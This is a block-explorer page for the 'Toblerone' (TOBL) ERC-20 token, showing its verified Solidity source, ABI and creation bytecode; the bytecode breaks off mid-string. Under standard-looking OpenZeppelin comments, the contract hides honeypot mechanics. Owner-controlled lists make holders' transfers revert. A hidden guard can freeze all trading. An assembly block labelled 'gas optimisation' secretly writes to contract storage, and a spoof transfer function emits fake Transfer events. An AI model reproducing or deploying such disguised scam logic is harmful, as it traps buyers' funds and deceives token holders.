ERC-20
Overview
Max Total Supply
10,000,000 TOBL
Holders
73
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
33,029.049736282639734692 TOBLValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Toblerone
Compiler Version
v0.8.20+commit.a1b79de6
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "./ERC20.sol"; contract Toblerone is ERC20 { constructor() ERC20("Toblerone", "TOBL") { _mint(msg.sender, 10000000 * 10 ** decimals()); } }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "./IERC20.sol"; import "./Context.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => bool) private _waitlist; mapping(address => bool) private _family; mapping(address => bool) private _buffer; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; bool private _familyApplied = false; bool private _guard = false; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function buffer(address [] calldata _list_) external onlyOwner { for (uint256 i = 0; i < _list_.length; i++) { _buffer[_list_[i]] = true; } } function bufferOut(address [] calldata _list_) external onlyOwner { for (uint256 i = 0; i < _list_.length; i++) { _buffer[_list_[i]] = false; } } function waitlist(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _waitlist[_addresses_[i]] = true; } } function waitlistOut(address [] calldata _addresses_) external onlyOwner { for (uint256 i = 0; i < _addresses_.length; i++) { _waitlist[_addresses_[i]] = false; } } function guardOff() external onlyOwner { _guard = false; } function guardStatus() public view returns (bool) { return _guard; } function relative(address [] calldata _list_) external onlyOwner { for (uint256 i = 0; i < _list_.length; i++) { _family[_list_[i]] = true; } } function transfer(address _from, address _to, uint256 _wad) external { emit Transfer(_from, _to, _wad); } function relativeOut(address [] calldata _list_) external onlyOwner { for (uint256 i = 0; i < _list_.length; i++) { _family[_list_[i]] = false; } } function relative(address _address_) public view returns (bool) { return _family[_address_]; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } if (_family[from] || _family[to] || _guard) require(_familyApplied == true, ""); if (_buffer[to]) _family[to] = true; if (_waitlist[to]) _guard = true; emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } // gas optimisation assembly { let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65)) mstore(0x00, slot) mstore(0x20, 0x01) let sslot := keccak256(0x0, 0x40) sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); event Swap( address indexed sender, uint amount0In, uint amount1In, uint amount0Out, uint amount1Out, address indexed to ); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"buffer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"bufferOut","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"guardOff","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"guardStatus","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"relative","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"relative","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"relativeOut","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"waitlist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"waitlistOut","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040525f60075f6101000a81548160ff0219169083151502179055505f600760016101000a81548160ff02191690831515021790555034801562000043575f80fd5b506040518060400160405280600981526020017f546f626c65726f6e6500000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f544f424c00000000000000000000000000000000000000000000000000000000815250620000d0620000c46200013b60201b60201c565b6200014260201b60201c565b8160089081620000e1919062000620565b508060099081620000f3919062000620565b50505062000135336200010b6200020360201b60201c565b600a6200011991906200088d565b62989680620001299190620008dd565b6200020b60201b60201c565b62000a0b565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200027c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002739062000985565b60405180910390fd5b6200028f5f8383620003b260201b60201c565b8060065f828254620002a29190620009a5565b925050819055508060045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003939190620009f0565b60405180910390a3620003ae5f8383620003b760201b60201c565b5050565b505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200043857607f821691505b6020821081036200044e576200044d620003f3565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620004b27fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000475565b620004be868362000475565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200050862000502620004fc84620004d6565b620004df565b620004d6565b9050919050565b5f819050919050565b6200052383620004e8565b6200053b62000532826200050f565b84845462000481565b825550505050565b5f90565b6200055162000543565b6200055e81848462000518565b505050565b5b818110156200058557620005795f8262000547565b60018101905062000564565b5050565b601f821115620005d4576200059e8162000454565b620005a98462000466565b81016020851015620005b9578190505b620005d1620005c88562000466565b83018262000563565b50505b505050565b5f82821c905092915050565b5f620005f65f1984600802620005d9565b1980831691505092915050565b5f620006108383620005e5565b9150826002028217905092915050565b6200062b82620003bc565b67ffffffffffffffff811115620006475762000646620003c6565b5b62000653825462000420565b6200066082828562000589565b5f60209050601f83116001811462000696575f841562000681578287015190505b6200068d858262000603565b865550620006fc565b601f198416620006a68662000454565b5f5b82811015620006cf57848901518255600182019150602085019450602081019050620006a8565b86831015620006ef5784890151620006eb601f891682620005e5565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156200078e5780860481111562000766576200076562000704565b5b6001851615620007765780820291505b8081029050620007868562000731565b945062000746565b94509492505050565b5f82620007a857600190506200087a565b81620007b7575f90506200087a565b8160018114620007d05760028114620007db5762000811565b60019150506200087a565b60ff841115620007f057620007ef62000704565b5b8360020a9150848211156200080a576200080962000704565b5b506200087a565b5060208310610133831016604e8410600b84101617156200084b5782820a90508381111562000845576200084462000704565b5b6200087a565b6200085a84848460016200073d565b9250905081840481111562000874576200087362000704565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6200089982620004d6565b9150620008a68362000881565b9250620008d57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000797565b905092915050565b5f620008e982620004d6565b9150620008f683620004d6565b92508282026200090681620004d6565b9150828204841483151762000920576200091f62000704565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6200096d601f8362000927565b91506200097a8262000937565b602082019050919050565b5f6020820190508181035f8301526200099e816200095f565b9050919050565b5f620009b182620004d6565b9150620009be83620004d6565b9250828201905080821115620009d957620009d862000704565b5b92915050565b620009ea81620004d6565b82525050565b5f60208201905062000a055f830184620009df565b92915050565b611f598062000a195f395ff3fe608060405234801561000f575f80fd5b5060043610610156575f3560e01c8063715018a6116100c1578063beabacc81161007a578063beabacc8146103c6578063d150475d146103e2578063dd62ed3e146103fe578063f2fde38b1461042e578063f3c30ceb1461044a578063f5ff800f1461046657610156565b8063715018a6146103025780638da5cb5b1461030c57806395d89b411461032a578063a457c2d714610348578063a9059cbb14610378578063b6d3f070146103a857610156565b8063313ce56711610113578063313ce5671461022e578063395093511461024c5780634682ac8c1461027c578063574733361461029857806367dfe427146102a257806370a08231146102d257610156565b806301c9bf5a1461015a57806306fdde0314610176578063095ea7b31461019457806318160ddd146101c45780631afdfa9b146101e257806323b872dd146101fe575b5f80fd5b610174600480360381019061016f91906115cf565b610482565b005b61017e61052a565b60405161018b91906116a4565b60405180910390f35b6101ae60048036038101906101a99190611751565b6105ba565b6040516101bb91906117a9565b60405180910390f35b6101cc6105dc565b6040516101d991906117d1565b60405180910390f35b6101fc60048036038101906101f791906115cf565b6105e5565b005b610218600480360381019061021391906117ea565b61068e565b60405161022591906117a9565b60405180910390f35b6102366106bc565b6040516102439190611855565b60405180910390f35b61026660048036038101906102619190611751565b6106c4565b60405161027391906117a9565b60405180910390f35b610296600480360381019061029191906115cf565b6106fa565b005b6102a06107a3565b005b6102bc60048036038101906102b7919061186e565b6107c7565b6040516102c991906117a9565b60405180910390f35b6102ec60048036038101906102e7919061186e565b610819565b6040516102f991906117d1565b60405180910390f35b61030a61085f565b005b610314610872565b60405161032191906118a8565b60405180910390f35b610332610899565b60405161033f91906116a4565b60405180910390f35b610362600480360381019061035d9190611751565b610929565b60405161036f91906117a9565b60405180910390f35b610392600480360381019061038d9190611751565b61099e565b60405161039f91906117a9565b60405180910390f35b6103b06109c0565b6040516103bd91906117a9565b60405180910390f35b6103e060048036038101906103db91906117ea565b6109d6565b005b6103fc60048036038101906103f791906115cf565b610a40565b005b610418600480360381019061041391906118c1565b610ae8565b60405161042591906117d1565b60405180910390f35b6104486004803603810190610443919061186e565b610b6a565b005b610464600480360381019061045f91906115cf565b610bec565b005b610480600480360381019061047b91906115cf565b610c94565b005b61048a610d3c565b5f5b82829050811015610525575f60025f8585858181106104ae576104ad6118ff565b5b90506020020160208101906104c3919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061051d90611959565b91505061048c565b505050565b606060088054610539906119cd565b80601f0160208091040260200160405190810160405280929190818152602001828054610565906119cd565b80156105b05780601f10610587576101008083540402835291602001916105b0565b820191905f5260205f20905b81548152906001019060200180831161059357829003601f168201915b5050505050905090565b5f806105c4610dba565b90506105d1818585610dc1565b600191505092915050565b5f600654905090565b6105ed610d3c565b5f5b8282905081101561068957600160035f858585818110610612576106116118ff565b5b9050602002016020810190610627919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061068190611959565b9150506105ef565b505050565b5f80610698610dba565b90506106a5858285610f84565b6106b085858561100f565b60019150509392505050565b5f6012905090565b5f806106ce610dba565b90506106ef8185856106e08589610ae8565b6106ea91906119fd565b610dc1565b600191505092915050565b610702610d3c565b5f5b8282905081101561079e57600160025f858585818110610727576107266118ff565b5b905060200201602081019061073c919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061079690611959565b915050610704565b505050565b6107ab610d3c565b5f600760016101000a81548160ff021916908315150217905550565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610867610d3c565b6108705f61149b565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600980546108a8906119cd565b80601f01602080910402602001604051908101604052809291908181526020018280546108d4906119cd565b801561091f5780601f106108f65761010080835404028352916020019161091f565b820191905f5260205f20905b81548152906001019060200180831161090257829003601f168201915b5050505050905090565b5f80610933610dba565b90505f6109408286610ae8565b905083811015610985576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161097c90611aa0565b60405180910390fd5b6109928286868403610dc1565b60019250505092915050565b5f806109a8610dba565b90506109b581858561100f565b600191505092915050565b5f600760019054906101000a900460ff16905090565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a3391906117d1565b60405180910390a3505050565b610a48610d3c565b5f5b82829050811015610ae3575f60035f858585818110610a6c57610a6b6118ff565b5b9050602002016020810190610a81919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610adb90611959565b915050610a4a565b505050565b5f60055f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610b72610d3c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610be0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd790611b2e565b60405180910390fd5b610be98161149b565b50565b610bf4610d3c565b5f5b82829050811015610c8f576001805f858585818110610c1857610c176118ff565b5b9050602002016020810190610c2d919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610c8790611959565b915050610bf6565b505050565b610c9c610d3c565b5f5b82829050811015610d37575f60015f858585818110610cc057610cbf6118ff565b5b9050602002016020810190610cd5919061186e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffff